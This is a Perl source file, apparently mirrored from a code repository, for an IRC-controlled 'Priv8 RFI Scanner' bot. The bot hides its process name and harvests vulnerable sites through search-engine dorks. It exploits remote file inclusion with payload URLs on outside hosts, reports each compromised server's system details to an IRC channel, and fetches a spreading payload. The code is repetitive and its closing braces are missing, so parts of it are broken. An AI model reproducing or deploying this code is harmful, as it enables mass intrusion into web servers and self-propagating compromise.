mirror of
synced 2024-12-19 18:06:10 +00:00
1861 lines
71 KiB
1861 lines
71 KiB
![]() |
$process = "/usr/sbin/ateam";
my $printcmd = "http://freewebtown.com/eridjon/cmdd.txt??";
my $id = "http://unisel.t35.com/abe.txt?";
my $spread = "http://unisel.t35.com/t.txt";
my $ircserver = "irc.malaysiairc.org";
my $start = "!scan";
my $port = "6667";
my $nickname = "TettHost" . int( rand(999) ) . "]";
my $admin = "My","Aliff";
my $channel = "#test"; ## the normal chan to scan, and see the results too :P
my $chanres = "#test"; ## the channel where u can find all the results of the bot
my $verz = "Priv8 RFI Scanner v1.0 beta";
print "\n";
print " Priv 8 Scanner\n";
print " Author: SeaNet\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
my $pid = fork;
exit if $pid;
$0 = "$process" . "\0" x 16;
my $dsp = IO::Socket::INET->new(
PeerAddr => "$ircserver",
PeerPort => "$port",
Proto => "tcp"
) or die "Can not connect on server!\n";
print $dsp "NICK $nickname\r\n";
print $dsp "USER infira 8 * : infira \r\n";
print $dsp "JOIN $channel\r\n";
print $dsp "PRIVMSG $channel :9,1Priv8 Scaner Pornit!! \r\n";
print $dsp "PRIVMSG $channel :8,1Comanda Scan:9,1 !scan bug dork 0,1& 4,1!google bug dork \r\n";
print $dsp "PRIVMSG $channel :9,1Priv8 RFIScanner powered By SeaNet<65> \r\n";
print $dsp "NICK $nickname\r\n";
print $dsp "USER SeaNet * : SeaNet \r\n";
print $dsp "JOIN $chanres\r\n";
print $dsp "PRIVMSG $chanres :9,1Aici vin rezultatele :) \r\n";
print $dsp "PRIVMSG $chanres :9,1Priv8 RFIScanner powered By SeaNet<65> \r\n";
while ( $line = <$dsp> ) {
$line =~ s/\r\n$//;
if ( $line =~ /^PING \:(.*)/ ) {
print "PONG :$1";
print $dsp "PONG :$1";
if ( $line =~ /PRIVMSG $channel :!help/ ) {
display( $dsp,
"PRIVMSG $channel :9,1Working ..."
display( $dsp,
"PRIVMSG $channel :8,1[Ajutor]9,1 Pentru a scana foloseste comanda :4,1 !scan bug dork & !google bug dork"
display( $dsp,
"PRIVMSG $channel :8,1[Ajutor]9,1 Pentru informatii server tasteaza: 4,1!info"
if ( $line =~ /PRIVMSG $channel :!info/ ) {
my $sysos = `uname -sr`;
my $uptime = `uptime`;
if ( $sysos =~ /freebsd/i ) {
$sysname = `hostname`;
$memory =
`expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
$swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
elsif ( $sysos =~ /linux/i ) {
$sysname = `hostname -f`;
$memory = `free -m |grep -i mem | awk '{print \$2}'`;
$swap = `free -m |grep -i swap | awk '{print \$2}'`;
else {
$sysname = "No Found";
$memory = "No found";
$swap = "No Found";
$uptime =~ s/\n//g;
$sysname =~ s/\n//g;
$sysos =~ s/\n//g;
display( $dsp,
"PRIVMSG $channel :9,1Working ..."
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Server: $ircserver Port: $port"
display( $dsp,
"PRIVMSG $channel :8,1[Info] 9,1Software: $sysos"
display( $dsp,
"PRIVMSG $channel :8,1[Info] 9,1Process/Pid:8,1 $process"
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Uptime: $uptime" );
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Memorie: $memory Swap: $swap"
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Creator: SeaNet"
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Versiune: $verz"
if ( $line =~ /PRIVMSG $channel :!id/ )
{ ## <20><> Script made by kangkung . Don't remove this comment !
my $testid = $id;
my $req = HTTP::Request->new( GET => $testid );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /<\?php/ ) {
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Id`ul este online"
else {
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Id`ul nu este activ."
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Modifica setarile cu noul id."
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Ruleaza din nou scannerul."
display( $dsp,
"PRIVMSG $channel :8,1[WARNING]9,1 Deconectare initiata."
display( $dsp, "PRIVMSG $channel :8,1[WARNING]9,1 Bye Bye" );
display( $dsp, "QUIT" );
if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1Scanare pornita pentru: 4,1$dork"
my @google = &googlet($dork);
push( my @tot, @google );
my @puliti = &unici(@tot);
display( $dsp,
"PRIVMSG $channel :9,1GOOGLE "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 9,1 pentru:4,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1 Google a terminat pentru:4,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: $un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: Free: $free , Used: $used , Total: $all"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: $pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: $sof1"
display( $dsp,
"PRIVMSG $channel :9,1Ip Addr: $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
if ( $line =~ /PRIVMSG $channel :!google\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
my @google = &googlet($dork);
push( my @tot, @google );
my @puliti = &unici(@tot);
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1Google ByPASS "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 9,1pentru4,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :8,1[Info]9,1Google ByPASS a terminanat pentru4,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1Off 9,1Os: $os Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :12(4hdd12) 12 Free: ($free) Used: ($used) Total: ($all) "
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :12(4php12) 12 $php1"
display( $dsp,
"PRIVMSG $channel :12(4software12) 12 $sof1 "
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :12(4server-name12) 12 $name1 "
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
my @alltheweb = &alltheweb($dork);
push( my @tot, @alltheweb );
my @puliti = &unici(@tot);
display( $dsp,
"PRIVMSG $channel :9,1ALLTHEWEB "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 9,1pentru4,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :9,1AllTheWeb a terminat pentru4,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
my @uol = &uolsub($dork);
push( my @tot, @uol );
my @puliti = &unici(@tot);
display( $dsp,
"PRIVMSG $channel :9,1UOL "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 11pentru9,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :9,1UOL a terminat pentru4,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
my @altavista = &altavista($dork);
push( my @tot, @allist, @alldeist, @allistus );
my @puliti = &unici(@tot);
display( $dsp,
"PRIVMSG $channel :9,1ALTAVISTA "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 9,1pentru4,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :9,1ALTAVISTA a terminat pentru9,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
my @searchlist = &search($dork);
my @search2 = &searchs($dork);
push( my @tot, @searchlist, @search2 );
my @puliti = &unici(@tot);
display( $dsp,
"PRIVMSG $channel :9,1SEARCH "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 9,1 pentru4,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :9,1SEARCH a terminat pentru4,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
my @mlist = &msn($dork);
push( my @tot, @mlist );
my @puliti = &unici(@tot);
display( $dsp,
"PRIVMSG $channel :9,1MSN "
. scalar(@tot)
. " 9,1/9,1 "
. scalar(@puliti)
. " 9,1pentru4,1 $dork" );
my $uni = scalar(@puliti);
foreach my $site (@puliti) {
if ( $contatore % 100 == 0 ) {
if ( $contatore == $uni - 1 ) {
display( $dsp,
"PRIVMSG $channel :12MSN a terminat pentru4,1 $dork"
my $test = "http://" . $site . $bug . $id . "?";
my $print = "http://" . $site . $bug . $printcmd . "?";
my $req = HTTP::Request->new( GET => $test );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
if ( $response->is_success ) {
my $re = $response->content;
if ( $re =~ /kangkung/ && $re =~ /uid=/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1ID: $id1"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
my $test2 =
"http://" . $site . $bug . $spread . "?";
my $reqz = HTTP::Request->new( GET => $test2 );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($reqz);
elsif ( $re =~ /kangkung/ ) {
my $hs = geths($print);
if ( $hosts{$hs} == "1" ) {
$x = os($test);
( $type, $space ) = split( /\,/, $x );
display( $dsp,
"PRIVMSG $channel :9,1Exploiting .."
display( $dsp,
"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print"
display( $dsp,
"PRIVMSG $channel :9,1Uname -a: 8,1$un"
display( $dsp,
"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)"
display( $dsp,
"PRIVMSG $channel :9,1Uptime: 8,1 $up"
display( $dsp,
"PRIVMSG $channel :9,1PWD: 8,1$pwd1"
display( $dsp,
"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1"
display( $dsp,
"PRIVMSG $channel :9,1Software: 8,1 $sof1"
display( $dsp,
"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1"
display( $dsp,
"PRIVMSG $channel :9,1Hostname: 8,1 $name1"
display( $dsp,
"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
display( $dsp,
"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print"
if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) {
if ( my $pid = fork ) {
waitpid( $pid, 0 );
else {
if (fork) {
else {
my $bug = $1;
my $dork = $2;
my $contatore = 0;
my %hosts;
my @asklist = &ask($dork);
push( my @tot, @asklist );
my @puliti = &unici(@tot);
display( $dsp,
